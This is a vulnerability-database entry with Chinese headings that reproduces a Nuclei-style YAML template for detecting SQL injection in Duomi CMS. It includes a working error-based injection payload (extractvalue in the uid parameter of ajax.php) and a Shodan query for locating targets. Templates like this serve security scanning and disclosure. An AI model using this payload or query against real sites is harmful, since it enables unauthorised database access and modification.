漏洞描述
Duomi CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
duomicms-sql-injection: Duomi CMS - SQL Injection
PoC代码[已公开]
id: duomicms-sql-injection
info:
name: Duomi CMS - SQL Injection
author: pikpikcu
severity: critical
description: Duomi CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://redn3ck.github.io/2016/11/01/duomiCMS/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-89
metadata:
verified: true
max-request: 1
shodan-query: title:"DuomiCMS"
tags: duomicms,sqli,vuln
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))"
matchers-condition: and
matchers:
- type: word
words:
- '{{md5({{num}})}}'
- type: status
status:
- 200
# digest: 4a0a00473045022100afab240385af02c940e4f8c4b2db3f95c566cada6afda73486d00167bcadec3a02200d6b87507530fd1191d639b5ab795ce5ab8e39db547846d53418441e19161a7a:922c64590222798bb761d5b6d8e72950